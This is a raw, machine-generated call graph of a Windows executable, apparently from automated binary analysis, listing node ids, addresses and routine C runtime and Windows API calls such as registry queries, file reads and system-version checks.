125722 97234->97325 97236 124fa1 __fread_nolock 97237 124fdc 97236->97237 97238 1250a5 97236->97238 97239 163d1d 97236->97239 97242 163d22 97237->97242 97243 1250f5 40 API calls 97237->97243 97248 12506e messages 97237->97248 97334 12511f 97237->97334 97328 1242a2 CreateStreamOnHGlobal 97238->97328 97339 19304d 74 API calls 97239->97339 97244 12511f 64 API calls 97242->97244 97243->97237 97245 163d45 97244->97245 97246 1250f5 40 API calls 97245->97246 97246->97248 97248->97126 97250 125107 97249->97250 97251 163d70 97249->97251 97361 14e8c4 97250->97361 97254 1928fe 97503 19274e 97254->97503 97256 192919 97256->97134 97260 14e536 ___scrt_is_nonwritable_in_current_image 97257->97260 97258 14e544 97282 14f2d9 20 API calls __dosmaperr 97258->97282 97260->97258 97262 14e574 97260->97262 97261 14e549 97283 1527ec 26 API calls __fread_nolock 97261->97283 97264 14e586 97262->97264 97265 14e579 97262->97265 97274 158061 97264->97274 97284 14f2d9 20 API calls __dosmaperr 97265->97284 97268 14e58f 97269 14e595 97268->97269 97271 14e5a2 97268->97271 97285 14f2d9 20 API calls __dosmaperr 97269->97285 97286 14e5d4 LeaveCriticalSection __fread_nolock 97271->97286 97273 14e554 __fread_nolock 97273->97226 97275 15806d ___scrt_is_nonwritable_in_current_image 97274->97275 97287 152f5e EnterCriticalSection 97275->97287 97277 15807b 97288 1580fb 97277->97288 97281 1580ac __fread_nolock 97281->97268 97282->97261 97283->97273 97284->97273 97285->97273 97286->97273 97287->97277 97295 15811e 97288->97295 97289 158177 97306 154c7d 97289->97306 97294 158189 97300 158088 97294->97300 97319 153405 11 API calls 2 library calls 97294->97319 97295->97289 97295->97295 97295->97300 97304 14918d EnterCriticalSection 97295->97304 97305 1491a1 LeaveCriticalSection 97295->97305 97298 1581a8 97320 14918d EnterCriticalSection 97298->97320 97301 1580b7 97300->97301 97324 152fa6 LeaveCriticalSection 97301->97324 97303 1580be 97303->97281 97304->97295 97305->97295 97312 154c8a __dosmaperr 97306->97312 97307 154cca 97322 14f2d9 20 API calls __dosmaperr 97307->97322 97308 154cb5 RtlAllocateHeap 97310 154cc8 97308->97310 97308->97312 97313 1529c8 97310->97313 97312->97307 97312->97308 97321 144ead 7 API calls 2 library calls 97312->97321 97314 1529d3 RtlFreeHeap 97313->97314 97318 1529fc __dosmaperr 97313->97318 97315 1529e8 97314->97315 97314->97318 97323 14f2d9 20 API calls __dosmaperr 97315->97323 97317 1529ee GetLastError 97317->97318 97318->97294 97319->97298 97320->97300 97321->97312 97322->97310 97323->97317 97324->97303 97326 13fddb 22 API calls 97325->97326 97327 125734 97326->97327 97327->97236 97329 1242bc FindResourceExW 97328->97329 97333 1242d9 97328->97333 97330 1635ba LoadResource 97329->97330 97329->97333 97331 1635cf SizeofResource 97330->97331 97330->97333 97332 1635e3 LockResource 97331->97332 97331->97333 97332->97333 97333->97237 97335 12512e 97334->97335 97338 163d90 97334->97338 97340 14ece3 97335->97340 97339->97242 97343 14eaaa 97340->97343 97342 12513c 97342->97237 97345 14eab6 ___scrt_is_nonwritable_in_current_image 97343->97345 97344 14eac2 97356 14f2d9 20 API calls __dosmaperr 97344->97356 97345->97344 97346 14eae8 97345->97346 97358 14918d EnterCriticalSection 97346->97358 97349 14eac7 97357 1527ec 26 API calls __fread_nolock 97349->97357 97350 14eaf4 97359 14ec0a 62 API calls 2 library calls 97350->97359 97353 14eb08 97360 14eb27 LeaveCriticalSection __fread_nolock 97353->97360 97355 14ead2 __fread_nolock 97355->97342 97356->97349 97357->97355 97358->97350 97359->97353 97360->97355 97364 14e8e1 97361->97364 97363 125118 97363->97254 97365 14e8ed ___scrt_is_nonwritable_in_current_image 97364->97365 97366 14e900 ___scrt_fastfail 97365->97366 97367 14e92d 97365->97367 97368 14e925 __fread_nolock 97365->97368 97391 14f2d9 20 API calls __dosmaperr 97366->97391 97377 14918d EnterCriticalSection 97367->97377 97368->97363 97370 14e937 97378 14e6f8 97370->97378 97373 14e91a 97392 1527ec 26 API calls __fread_nolock 97373->97392 97377->97370 97381 14e70a ___scrt_fastfail 97378->97381 97384 14e727 97378->97384 97379 14e717 97466 14f2d9 20 API calls __dosmaperr 97379->97466 97381->97379 97381->97384 97386 14e76a __fread_nolock 97381->97386 97382 14e71c 97467 1527ec 26 API calls __fread_nolock 97382->97467 97393 14e96c LeaveCriticalSection __fread_nolock 97384->97393 97385 14e886 ___scrt_fastfail 97469 14f2d9 20 API calls __dosmaperr 97385->97469 97386->97384 97386->97385 97394 14d955 97386->97394 97401 158d45 97386->97401 97468 14cf78 26 API calls 3 library calls 97386->97468 97391->97373 97392->97368 97393->97368 97395 14d976 97394->97395 97396 14d961 97394->97396 97395->97386 97470 14f2d9 20 API calls __dosmaperr 97396->97470 97398 14d966 97471 1527ec 26 API calls __fread_nolock 97398->97471 97400 14d971 97400->97386 97402 158d57 97401->97402 97403 158d6f 97401->97403 97481 14f2c6 20 API calls __dosmaperr 97402->97481 97404 1590d9 97403->97404 97410 158db4 97403->97410 97497 14f2c6 20 API calls __dosmaperr 97404->97497 97406 158d5c 97482 14f2d9 20 API calls __dosmaperr 97406->97482 97409 1590de 97498 14f2d9 20 API calls __dosmaperr 97409->97498 97412 158dbf 97410->97412 97415 158d64 97410->97415 97419 158def 97410->97419 97483 14f2c6 20 API calls __dosmaperr 97412->97483 97413 158dcc 97499 1527ec 26 API calls __fread_nolock 97413->97499 97415->97386 97416 158dc4 97484 14f2d9 20 API calls __dosmaperr 97416->97484 97420 158e08 97419->97420 97421 158e2e 97419->97421 97422 158e4a 97419->97422 97420->97421 97428 158e15 97420->97428 97485 14f2c6 20 API calls __dosmaperr 97421->97485 97488 153820 21 API calls __dosmaperr 97422->97488 97424 158e33 97486 14f2d9 20 API calls __dosmaperr 97424->97486 97472 15f89b 97428->97472 97429 158e61 97430 1529c8 _free 20 API calls 97429->97430 97433 158e6a 97430->97433 97431 158e3a 97487 1527ec 26 API calls __fread_nolock 97431->97487 97432 158fb3 97435 159029 97432->97435 97438 158fcc GetConsoleMode 97432->97438 97436 1529c8 _free 20 API calls 97433->97436 97437 15902d ReadFile 97435->97437 97439 158e71 97436->97439 97440 159047 97437->97440 97441 1590a1 GetLastError 97437->97441 97438->97435 97442 158fdd 97438->97442 97443 158e96 97439->97443 97444 158e7b 97439->97444 97440->97441 97447 15901e 97440->97447 97445 159005 97441->97445 97446 1590ae 97441->97446 97442->97437 97448 158fe3 ReadConsoleW 97442->97448 97491 159424 28 API calls __wsopen_s 97443->97491 97489 14f2d9 20 API calls __dosmaperr 97444->97489 97464 158e45 __fread_nolock 97445->97464 97492 14f2a3 20 API calls __dosmaperr 97445->97492 97495 14f2d9 20 API calls __dosmaperr 97446->97495 97459 159083 97447->97459 97460 15906c 97447->97460 97447->97464 97448->97447 97453 158fff GetLastError 97448->97453 97449 1529c8 _free 20 API calls 97449->97415 97453->97445 97454 158e80 97490 14f2c6 20 API calls __dosmaperr 97454->97490 97455 1590b3 97496 14f2c6 20 API calls __dosmaperr 97455->97496 97461 15909a 97459->97461 97459->97464 97493 158a61 31 API calls 3 library calls 97460->97493 97494 1588a1 29 API calls __wsopen_s 97461->97494 97464->97449 97465 15909f 97465->97464 97466->97382 97467->97384 97468->97386 97469->97382 97470->97398 97471->97400 97473 15f8b5 97472->97473 97474 15f8a8 97472->97474 97476 15f8c1 97473->97476 97501 14f2d9 20 API calls __dosmaperr 97473->97501 97500 14f2d9 20 API calls __dosmaperr 97474->97500 97476->97432 97478 15f8ad 97478->97432 97479 15f8e2 97502 1527ec 26 API calls __fread_nolock 97479->97502 97481->97406 97482->97415 97483->97416 97484->97413 97485->97424 97486->97431 97487->97464 97488->97429 97489->97454 97490->97464 97491->97428 97492->97464 97493->97464 97494->97465 97495->97455 97496->97464 97497->97409 97498->97413 97499->97415 97500->97478 97501->97479 97502->97478 97506 14e4e8 97503->97506 97505 19275d 97505->97256 97509 14e469 97506->97509 97508 14e505 97508->97505 97510 14e48c 97509->97510 97511 14e478 97509->97511 97516 14e488 __alldvrm 97510->97516 97519 15333f 11 API calls 2 library calls 97510->97519 97517 14f2d9 20 API calls __dosmaperr 97511->97517 97513 14e47d 97518 1527ec 26 API calls __fread_nolock 97513->97518 97516->97508 97517->97513 97518->97516 97519->97516 97522 192e7a 97520->97522 97521 1928fe 27 API calls 97521->97522 97522->97521 97523 1250f5 40 API calls 97522->97523 97524 192d3b 97522->97524 97525 12511f 64 API calls 97522->97525 97523->97522 97524->97157 97524->97158 97525->97522 97527 1922d9 97526->97527 97528 1922e7 97526->97528 97529 14e5eb 29 API calls 97527->97529 97530 19232c 97528->97530 97531 14e5eb 29 API calls 97528->97531 97550 1922f0 97528->97550 97529->97528 97555 192557 97530->97555 97532 192311 97531->97532 97532->97530 97534 19231a 97532->97534 97538 14e678 67 API calls 97534->97538 97534->97550 97535 192370 97536 192395 97535->97536 97537 192374 97535->97537 97559 192171 97536->97559 97540 192381 97537->97540 97542 14e678 67 API calls 97537->97542 97538->97550 97543 14e678 67 API calls 97540->97543 97540->97550 97541 19239d 97544 1923c3 97541->97544 97545 1923a3 97541->97545 97542->97540 97543->97550 97566 1923f3 97544->97566 97547 1923b0 97545->97547 97548 14e678 67 API calls 97545->97548 97549 14e678 67 API calls 97547->97549 97547->97550 97548->97547 97549->97550 97550->97157 97551 1923de 97551->97550 97554 14e678 67 API calls 97551->97554 97552 1923ca 97552->97551 97574 14e678 97552->97574 97554->97550 97556 19257c 97555->97556 97558 192565 __fread_nolock 97555->97558 97557 14e8c4 __fread_nolock 40 API calls 97556->97557 97557->97558 97558->97535 97560 14ea0c ___std_exception_copy 21 API calls 97559->97560 97561 19217f 97560->97561 97562 14ea0c ___std_exception_copy 21 API calls 97561->97562 97563 192190 97562->97563 97564 14ea0c ___std_exception_copy 21 API calls 97563->97564 97565 19219c 97564->97565 97565->97541 97573 192408 97566->97573 97567 1924c0 97591 192724 97567->97591 97569 1921cc 40 API calls 97569->97573 97570 1924c7 97570->97552 97573->97567 97573->97569 97573->97570 97587 192606 97573->97587 97595 192269 40 API calls 97573->97595 97575 14e684 ___scrt_is_nonwritable_in_current_image 97574->97575 97576 14e695 97575->97576 97577 14e6aa 97575->97577 97669 14f2d9 20 API calls __dosmaperr 97576->97669 97579 14e6a5 __fread_nolock 97577->97579 97652 14918d EnterCriticalSection 97577->97652 97579->97551 97580 14e69a 97670 1527ec 26 API calls __fread_nolock 97580->97670 97583 14e6c6 97653 14e602 97583->97653 97585 14e6d1 97671 14e6ee LeaveCriticalSection __fread_nolock 97585->97671 97588 192617 97587->97588 97589 19261d 97587->97589 97588->97589 97596 1926d7 97588->97596 97589->97573 97592 192742 97591->97592 97593 192731 97591->97593 97592->97570 97594 14dbb3 65 API calls 97593->97594 97594->97592 97595->97573 97597 192714 97596->97597 97598 192703 97596->97598 97597->97588 97600 14dbb3 97598->97600 97601 14dbc1 97600->97601 97606 14dbdd 97600->97606 97602 14dbe3 97601->97602 97603 14dbcd 97601->97603 97601->97606 97609 14d9cc 97602->97609 97612 14f2d9 20 API calls __dosmaperr 97603->97612 97606->97597 97607 14dbd2 97613 1527ec 26 API calls __fread_nolock 97607->97613 97614 14d97b 97609->97614 97612->97607 97613->97606 97615 14d987 ___scrt_is_nonwritable_in_current_image 97614->97615 97622 14918d EnterCriticalSection 97615->97622 97617 14d995 97623 14d9f4 97617->97623 97622->97617 97631 1549a1 97623->97631 97629 14d9a2 97632 14d955 __fread_nolock 26 API calls 97631->97632 97633 1549b0 97632->97633 97634 15f89b __fread_nolock 26 API calls 97633->97634 97635 1549b6 97634->97635 97636 153820 _strftime 21 API calls 97635->97636 97639 14da09 97635->97639 97637 154a15 97636->97637 97638 1529c8 _free 20 API calls 97637->97638 97638->97639 97640 14da3a 97639->97640 97642 14da4c 97640->97642 97646 14da24 97640->97646 97641 14da5a 97643 14f2d9 __dosmaperr 20 API calls 97641->97643 97642->97641 97642->97646 97650 14da85 __fread_nolock 97642->97650 97651 154a56 62 API calls 97646->97651 97647 14dc0b 62 API calls 97647->97650 97648 14d955 __fread_nolock 26 API calls 97648->97650 97649 1559be __wsopen_s 62 API calls 97649->97650 97650->97646 97650->97647 97650->97648 97650->97649 97651->97629 97652->97583 97654 14e624 97653->97654 97655 14e60f 97653->97655 97661 14e61f 97654->97661 97672 14dc0b 97654->97672 97697 14f2d9 20 API calls __dosmaperr 97655->97697 97658 14e614 97698 1527ec 26 API calls __fread_nolock 97658->97698 97661->97585 97664 14d955 __fread_nolock 26 API calls 97665 14e646 97664->97665 97682 15862f 97665->97682 97668 1529c8 _free 20 API calls 97668->97661 97669->97580 97670->97579 97671->97579 97673 14dc23 97672->97673 97677 14dc1f 97672->97677 97674 14d955 __fread_nolock 26 API calls 97673->97674 97673->97677 97675 14dc43 97674->97675 97699 1559be 97675->97699 97678 154d7a 97677->97678 97679 154d90 97678->97679 97681 14e640 97678->97681 97680 1529c8 _free 20 API calls 97679->97680 97679->97681 97680->97681 97681->97664 97683 158653 97682->97683 97684 15863e 97682->97684 97686 15868e 97683->97686 97691 15867a 97683->97691 97822 14f2c6 20 API calls __dosmaperr 97684->97822 97824 14f2c6 20 API calls __dosmaperr 97686->97824 97688 158643 97823 14f2d9 20 API calls __dosmaperr 97688->97823 97689 158693 97825 14f2d9 20 API calls __dosmaperr 97689->97825 97819 158607 97691->97819 97694 14e64c 97694->97661 97694->97668 97695 15869b 97826 1527ec 26 API calls __fread_nolock 97695->97826 97697->97658 97698->97661 97700 1559ca ___scrt_is_nonwritable_in_current_image 97699->97700 97701 1559d2 97700->97701 97702 1559ea 97700->97702 97778 14f2c6 20 API calls __dosmaperr 97701->97778 97704 155a88 97702->97704 97707 155a1f 97702->97707 97783 14f2c6 20 API calls __dosmaperr 97704->97783 97705 1559d7 97779 14f2d9 20 API calls __dosmaperr 97705->97779 97724 155147 EnterCriticalSection 97707->97724 97708 155a8d 97784 14f2d9 20 API calls __dosmaperr 97708->97784 97712 155a25 97714 155a56 97712->97714 97715 155a41 97712->97715 97713 155a95 97785 1527ec 26 API calls __fread_nolock 97713->97785 97725 155aa9 97714->97725 97780 14f2d9 20 API calls __dosmaperr 97715->97780 97718 1559df __fread_nolock 97718->97677 97720 155a46 97781 14f2c6 20 API calls __dosmaperr 97720->97781 97724->97712 97726 155ad7 97725->97726 97766 155ad0 97725->97766 97727 155adb 97726->97727 97728 155afa 97726->97728 97731 155b2e 97728->97731 97732 155b4b 97728->97732 97810 140a8c 97766->97810 97778->97705 97779->97718 97780->97720 97783->97708 97784->97713 97785->97718 97827 158585 97819->97827 97822->97688 97823->97694 97824->97689 97825->97695 97826->97694 97828 158591 ___scrt_is_nonwritable_in_current_image 97827->97828 97838 155147 EnterCriticalSection 97828->97838 97830 15859f 97838->97830 97876 12105b 97881 12344d 97876->97881 97878 12106a 97912 1400a3 29 API calls __onexit 97878->97912 97880 121074 97882 12345d __wsopen_s 97881->97882 97883 12a961 22 API calls 97882->97883 97884 123513 97883->97884 97885 123a5a 24 API calls 97884->97885 97886 12351c 97885->97886 97913 123357 97886->97913 97889 1233c6 22 API calls 97890 123535 97889->97890 97891 12515f 22 API calls 97890->97891 97892 123544 97891->97892 97893 12a961 22 API calls 97892->97893 97894 12354d 97893->97894 97895 12a6c3 22 API calls 97894->97895 97896 123556 RegOpenKeyExW 97895->97896 97897 163176 RegQueryValueExW 97896->97897 97902 123578 97896->97902 97898 163193 97897->97898 97899 16320c RegCloseKey 97897->97899 97900 13fe0b 22 API calls 97898->97900 97899->97902 97908 16321e _wcslen 97899->97908 97901 1631ac 97900->97901 97904 125722 22 API calls 97901->97904 97902->97878 97903 124c6d 22 API calls 97903->97908 97905 1631b7 RegQueryValueExW 97904->97905 97906 1631d4 97905->97906 97909 1631ee messages 97905->97909 97907 126b57 22 API calls 97906->97907 97907->97909 97908->97902 97908->97903 97910 129cb3 22 API calls 97908->97910 97911 12515f 22 API calls 97908->97911 97909->97899 97910->97908 97911->97908 97912->97880 97914 161f50 __wsopen_s 97913->97914 97915 123364 GetFullPathNameW 97914->97915 97916 123386 97915->97916 97917 126b57 22 API calls 97916->97917 97918 1233a4 97917->97918 97918->97889 97919 121098 97924 1242de 97919->97924 97923 1210a7 97925 12a961 22 API calls 97924->97925 97926 1242f5 GetVersionExW 97925->97926 97927 126b57 22 API calls 97926->97927 97928 124342 97927->97928 97929 1293b2 22 API calls 97928->97929 97938 124378 97928->97938 97930 12436c 97929->97930 97932 1237a0 22 API calls 97930->97932 97931 12441b GetCurrentProcess IsWow64Process 97933 124437 97931->97933 97932->97938 97934 163824 GetSystemInfo 97933->97934 97935 12444f LoadLibraryA 97933->97935 97936 124460 GetProcAddress 97935->97936 97937 12449c GetSystemInfo 97935->97937 97936->97937 97940 124470 GetNativeSystemInfo 97936->97940 97941 124476 97937->97941 97938->97931 97939 1637df 97938->97939 97940->97941 97942 12109d 97941->97942 97943 12447a FreeLibrary 97941->97943 97944 1400a3 29 API calls __onexit 97942->97944 97943->97942 97944->97923 97945 12f7bf 97946 12f7d3 97945->97946 97947 12fcb6 97945->97947 97949 12fcc2 97946->97949 97950 13fddb 22 API calls 97946->97950 98041 12aceb 23 API calls messages 97947->98041 98042 12aceb 23 API calls messages 97949->98042 97952 12f7e5 97950->97952 97952->97949 97953 12fd3d 97952->97953 97954 12f83e 97952->97954 98043 191155 22 API calls 97953->98043 97970 12ed9d messages 97954->97970 97980 131310 97954->97980 97957 12fef7 97964 12a8c7 22 API calls 97957->97964 97957->97970 97960 174b0b 98045 19359c 82 API calls __wsopen_s 97960->98045 97961 12a8c7 22 API calls 97977 12ec76 messages 97961->97977 97962 174600 97966 12a8c7 22 API calls 97962->97966 97962->97970 97964->97970 97966->97970 97968 12fbe3 97968->97970 97971 174bdc 97968->97971 97979 12f3ae messages 97968->97979 97969 12a961 22 API calls 97969->97977 98046 19359c 82 API calls __wsopen_s 97971->98046 97973 1400a3 29 API calls pre_c_initialization 97973->97977 97974 140242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97974->97977 97975 174beb 98047 19359c 82 API calls __wsopen_s 97975->98047 97976 13fddb 22 API calls 97976->97977 97977->97957 97977->97960 97977->97961 97977->97962 97977->97968 97977->97969 97977->97970 97977->97973 97977->97974 97977->97975 97977->97976 97978 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97977->97978 97977->97979 98039 1301e0 256 API calls 2 library calls 97977->98039 98040 1306a0 41 API calls messages 97977->98040 97978->97977 97979->97970 98044 19359c 82 API calls __wsopen_s 97979->98044 97981 1317b0 97980->97981 97982 131376 97980->97982 98295 140242 5 API calls __Init_thread_wait 97981->98295 97983 131390 97982->97983 97984 176331 97982->97984 98048 131940 97983->98048 98300 1a709c 256 API calls 97984->98300 97988 1317ba 97991 1317fb 97988->97991 97993 129cb3 22 API calls 97988->97993 97990 17633d 97990->97977 97995 176346 97991->97995 97997 13182c 97991->97997 97992 131940 9 API calls 97994 1313b6 97992->97994 98001 1317d4 97993->98001 97994->97991 97996 1313ec 97994->97996 98301 19359c 82 API calls __wsopen_s 97995->98301 97996->97995 98020 131408 __fread_nolock 97996->98020 98297 12aceb 23 API calls messages 97997->98297 98000 131839 98298 13d217 256 API calls 98000->98298 98296 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98001->98296 98004 17636e 98302 19359c 82 API calls __wsopen_s 98004->98302 98006 13152f 98007 1763d1 98006->98007 98008 13153c 98006->98008 98304 1a5745 54 API calls _wcslen 98007->98304 98009 131940 9 API calls 98008->98009 98011 131549 98009->98011 98014 1764fa 98011->98014 98017 131940 9 API calls 98011->98017 98012 13fddb 22 API calls 98012->98020 98013 13fe0b 22 API calls 98013->98020 98024 176369 98014->98024 98305 19359c 82 API calls __wsopen_s 98014->98305 98015 131872 98299 13faeb 23 API calls 98015->98299 98022 131563 98017->98022 98020->98000 98020->98004 98020->98006 98020->98012 98020->98013 98021 1763b2 98020->98021 98020->98024 98058 12ec40 98020->98058 98303 19359c 82 API calls __wsopen_s 98021->98303 98022->98014 98025 12a8c7 22 API calls 98022->98025 98027 1315c7 messages 98022->98027 98024->97977 98025->98027 98026 131940 9 API calls 98026->98027 98027->98014 98027->98015 98027->98024 98027->98026 98030 13167b messages 98027->98030 98038 124f39 68 API calls 98027->98038 98082 1a959f 98027->98082 98085 1a958b 98027->98085 98088 19f0ec 98027->98088 98097 19744a 98027->98097 98154 18d4ce 98027->98154 98157 13effa 98027->98157 98214 196ef1 98027->98214 98028 13171d 98028->97977 98030->98028 98294 13ce17 22 API calls messages 98030->98294 98038->98027 98039->97977 98040->97977 98041->97949 98042->97953 98043->97970 98044->97970 98045->97970 98046->97975 98047->97970 98049 131981 98048->98049 98053 13195d 98048->98053 98306 140242 5 API calls __Init_thread_wait 98049->98306 98051 13198b 98051->98053 98307 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98051->98307 98057 1313a0 98053->98057 98308 140242 5 API calls __Init_thread_wait 98053->98308 98054 138727 98054->98057 98309 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98054->98309 98057->97992 98076 12ec76 messages 98058->98076 98059 13fddb 22 API calls 98059->98076 98060 140242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98060->98076 98061 12fef7 98068 12a8c7 22 API calls 98061->98068 98074 12ed9d messages 98061->98074 98064 174b0b 98313 19359c 82 API calls __wsopen_s 98064->98313 98065 12a8c7 22 API calls 98065->98076 98066 174600 98070 12a8c7 22 API calls 98066->98070 98066->98074 98068->98074 98070->98074 98072 12fbe3 98072->98074 98075 174bdc 98072->98075 98081 12f3ae messages 98072->98081 98073 12a961 22 API calls 98073->98076 98074->98020 98314 19359c 82 API calls __wsopen_s 98075->98314 98076->98059 98076->98060 98076->98061 98076->98064 98076->98065 98076->98066 98076->98072 98076->98073 98076->98074 98077 1400a3 29 API calls pre_c_initialization 98076->98077 98079 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98076->98079 98080 174beb 98076->98080 98076->98081 98310 1301e0 256 API calls 2 library calls 98076->98310 98311 1306a0 41 API calls messages 98076->98311 98077->98076 98079->98076 98315 19359c 82 API calls __wsopen_s 98080->98315 98081->98074 98312 19359c 82 API calls __wsopen_s 98081->98312 98316 1a7f59 98082->98316 98084 1a95af 98084->98027 98086 1a7f59 120 API calls 98085->98086 98087 1a959b 98086->98087 98087->98027 98089 127510 53 API calls 98088->98089 98090 19f126 98089->98090 98449 129e90 98090->98449 98092 19f136 98093 19f15b 98092->98093 98094 12ec40 256 API calls 98092->98094 98096 19f15f 98093->98096 98477 129c6e 98093->98477 98094->98093 98096->98027 98098 197469 98097->98098 98099 197474 98097->98099 98533 12b567 98098->98533 98100 197554 98099->98100 98103 12a961 22 API calls 98099->98103 98102 13fddb 22 API calls 98100->98102 98143 1976a4 98100->98143 98104 197587 98102->98104 98105 197495 98103->98105 98106 13fe0b 22 API calls 98104->98106 98107 12a961 22 API calls 98105->98107 98108 197598 98106->98108 98109 19749e 98107->98109 98506 126246 98108->98506 98111 127510 53 API calls 98109->98111 98113 1974aa 98111->98113 98538 12525f 98113->98538 98114 12a961 22 API calls 98116 1975ab 98114->98116 98118 126246 CloseHandle 98116->98118 98117 1974bf 98120 126350 22 API calls 98117->98120 98119 1975b2 98118->98119 98121 127510 53 API calls 98119->98121 98122 1974f2 98120->98122 98123 1975be 98121->98123 98124 19754a 98122->98124 98126 18d4ce 4 API calls 98122->98126 98125 126246 CloseHandle 98123->98125 98128 12b567 39 API calls 98124->98128 98127 1975c8 98125->98127 98129 197502 98126->98129 98510 125745 98127->98510 98128->98100 98129->98124 98130 197506 98129->98130 98131 129cb3 22 API calls 98130->98131 98133 197513 98131->98133 98580 18d2c1 26 API calls 98133->98580 98136 1975ea 98518 1253de 98136->98518 98137 1976de GetLastError 98138 1976f7 98137->98138 98584 126216 CloseHandle messages 98138->98584 98141 19751c 98141->98124 98142 1975f8 98581 1253c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98142->98581 98143->98027 98145 1975ff 98146 197645 98145->98146 98147 197619 98145->98147 98148 13fddb 22 API calls 98146->98148 98582 18ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98147->98582 98149 197679 98148->98149 98150 12a961 22 API calls 98149->98150 98152 197686 98150->98152 98152->98143 98583 18417d 22 API calls __fread_nolock 98152->98583 98605 18dbbe lstrlenW 98154->98605 98158 129c6e 22 API calls 98157->98158 98159 13f012 98158->98159 98160 17f0a8 98159->98160 98162 13fddb 22 API calls 98159->98162 98167 13f0a4 98160->98167 98629 199caa 39 API calls 98160->98629 98163 13f02b 98162->98163 98164 13fe0b 22 API calls 98163->98164 98165 13f03c 98164->98165 98166 126246 CloseHandle 98165->98166 98168 13f047 98166->98168 98169 12b567 39 API calls 98167->98169 98173 13f0b1 98167->98173 98170 12a961 22 API calls 98168->98170 98171 17f10a 98169->98171 98172 13f04f 98170->98172 98171->98173 98174 17f112 98171->98174 98175 126246 CloseHandle 98172->98175 98176 13fa5b 3 API calls 98173->98176 98177 12b567 39 API calls 98174->98177 98178 13f056 98175->98178 98182 13f0b8 98176->98182 98177->98182 98179 127510 53 API calls 98178->98179 98180 13f062 98179->98180 98181 126246 CloseHandle 98180->98181 98183 13f06c 98181->98183 98184 17f127 98182->98184 98185 13f0d3 98182->98185 98186 125745 5 API calls 98183->98186 98188 13fe0b 22 API calls 98184->98188 98187 126270 22 API calls 98185->98187 98189 13f07d 98186->98189 98190 13f0db 98187->98190 98191 17f12c 98188->98191 98192 13f085 98189->98192 98193 17f0a0 98189->98193 98610 13f141 98190->98610 98195 17f140 98191->98195 98630 13f866 ReadFile SetFilePointerEx 98191->98630 98200 1253de 27 API calls 98192->98200 98628 126216 CloseHandle messages 98193->98628 98204 17f144 __fread_nolock 98195->98204 98631 190e85 22 API calls ___scrt_fastfail 98195->98631 98199 13f0ea 98199->98204 98625 1262b5 22 API calls 98199->98625 98202 13f093 98200->98202 98624 1253c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98202->98624 98205 13f0fe 98208 13f138 98205->98208 98209 126246 CloseHandle 98205->98209 98206 13f09a 98206->98167 98207 17f069 98206->98207 98627 18ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98207->98627 98208->98027 98211 13f12c 98209->98211 98211->98208 98626 126216 CloseHandle messages 98211->98626 98212 17f080 98212->98167 98215 12a961 22 API calls 98214->98215 98216 196f1d 98215->98216 98217 12a961 22 API calls 98216->98217 98218 196f26 98217->98218 98219 196f3a 98218->98219 98220 12b567 39 API calls 98218->98220 98221 127510 53 API calls 98219->98221 98220->98219 98228 196f57 _wcslen 98221->98228 98222 196fbc 98224 127510 53 API calls 98222->98224 98223 1970bf 98225 124ecb 94 API calls 98223->98225 98226 196fc8 98224->98226 98227 1970d0 98225->98227 98231 12a8c7 22 API calls 98226->98231 98236 196fdb 98226->98236 98229 1970e5 98227->98229 98232 124ecb 94 API calls 98227->98232 98228->98222 98228->98223 98234 1970e9 98228->98234 98230 12a961 22 API calls 98229->98230 98229->98234 98233 19711a 98230->98233 98231->98236 98232->98229 98235 12a961 22 API calls 98233->98235 98234->98027 98239 197126 98235->98239 98237 197027 98236->98237 98240 197005 98236->98240 98243 12a8c7 22 API calls 98236->98243 98238 127510 53 API calls 98237->98238 98241 197034 98238->98241 98242 12a961 22 API calls 98239->98242 98244 1233c6 22 API calls 98240->98244 98246 19703d 98241->98246 98247 197047 98241->98247 98248 19712f 98242->98248 98243->98240 98245 19700f 98244->98245 98249 127510 53 API calls 98245->98249 98250 12a8c7 22 API calls 98246->98250 98771 18e199 GetFileAttributesW 98247->98771 98252 12a961 22 API calls 98248->98252 98253 19701b 98249->98253 98250->98247 98255 197138 98252->98255 98256 126350 22 API calls 98253->98256 98254 197050 98257 197063 98254->98257 98260 124c6d 22 API calls 98254->98260 98258 127510 53 API calls 98255->98258 98256->98237 98259 127510 53 API calls 98257->98259 98267 197069 98257->98267 98261 197145 98258->98261 98262 1970a0 98259->98262 98260->98257 98263 12525f 22 API calls 98261->98263 98772 18d076 57 API calls 98262->98772 98264 197166 98263->98264 98266 124c6d 22 API calls 98264->98266 98268 197175 98266->98268 98267->98234 98269 1971a9 98268->98269 98270 124c6d 22 API calls 98268->98270 98271 12a8c7 22 API calls 98269->98271 98272 197186 98270->98272 98273 1971ba 98271->98273 98272->98269 98275 126b57 22 API calls 98272->98275 98274 126350 22 API calls 98273->98274 98276 1971c8 98274->98276 98277 19719b 98275->98277 98278 126350 22 API calls 98276->98278 98280 126b57 22 API calls 98277->98280 98279 1971d6 98278->98279 98281 126350 22 API calls 98279->98281 98280->98269 98282 1971e4 98281->98282 98283 127510 53 API calls 98282->98283 98284 1971f0 98283->98284 98662 18d7bc 98284->98662 98286 197201 98287 18d4ce 4 API calls 98286->98287 98288 19720b 98287->98288 98289 127510 53 API calls 98288->98289 98292 197239 98288->98292 98290 197229 98289->98290 98716 192947 98290->98716 98293 124f39 68 API calls 98292->98293 98293->98234 98294->98030 98295->97988 98296->97991 98297->98000 98298->98015 98299->98015 98300->97990 98301->98024 98302->98024 98303->98024 98304->98022 98305->98024 98306->98051 98307->98053 98308->98054 98309->98057 98310->98076 98311->98076 98312->98074 98313->98074 98314->98080 98315->98074 98354 127510 98316->98354 98320 1a8049 98324 1a7fd5 messages 98320->98324 98328 127510 53 API calls 98320->98328 98341 1a8281 98320->98341 98409 18417d 22 API calls __fread_nolock 98320->98409 98410 1a851d 42 API calls _strftime 98320->98410 98321 1a844f 98418 1a8ee4 60 API calls 